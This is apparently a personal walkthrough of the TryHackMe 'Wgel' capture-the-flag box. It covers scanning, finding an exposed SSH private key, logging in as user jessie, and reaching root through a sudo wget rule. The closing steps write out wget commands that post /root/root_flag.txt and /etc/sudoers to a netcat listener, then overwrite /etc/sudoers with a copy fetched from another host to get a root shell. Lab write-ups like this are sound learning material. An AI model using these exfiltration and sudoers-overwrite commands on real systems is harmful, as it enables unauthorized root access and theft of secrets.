---
title: TryHackMe - Wgel CTF
created: '2021-07-22T18:51:03.380Z'
modified: '2021-07-22T21:27:19.278Z'
---

# TryHackMe - Wgel CTF

## Scanning and Enumerating the box
- Used `nmap -Pn -v -A 10.10.10.15`
  - 22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
  - 80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
    - Looks like default installation

- Used `gobuster dir -u http://10.10.10.15 -w SecLists/Discovery/Web-Content/common.txt`
  - Found subdirectory called **/sitemap**
    - Uses a template called **unapp**
      - There's a **/ssh/** folder that contains a **id_rsa**. Downloaded it!
    - After a lot of hints, I checked out the default apache page source and found a comment containing name **Jessie**
      - Logged into user **jessie**
        - User flag found
      - Checked `sudo -l`
        - User can run **wget** with **sudo NOPASSWD**
    
- To get the root flag, we can
  - Open another **jessie** session
    - Start `nc -lvvp 8080`
      - `sudo wget http://127.0.0.1:8080 --post-file /root/root_flag.txt`
      - Get the flag from the HTT headers
    - Or start `nc -lvvp 8080`
      - `sudo wget http://127.0.0.1:8080 --post-file /etc/sudoers`
      - Get the sudoers file, modify **jessie** to run **/bin/bash** with **NOPASSWD**
      - `sudo wget http://10.10.90.159:8080/sudoers -O /etc/sudoers`
      - `sudo -l` should say **(root) NOPASSWD: /bin/bash**
      - `sudo bash`
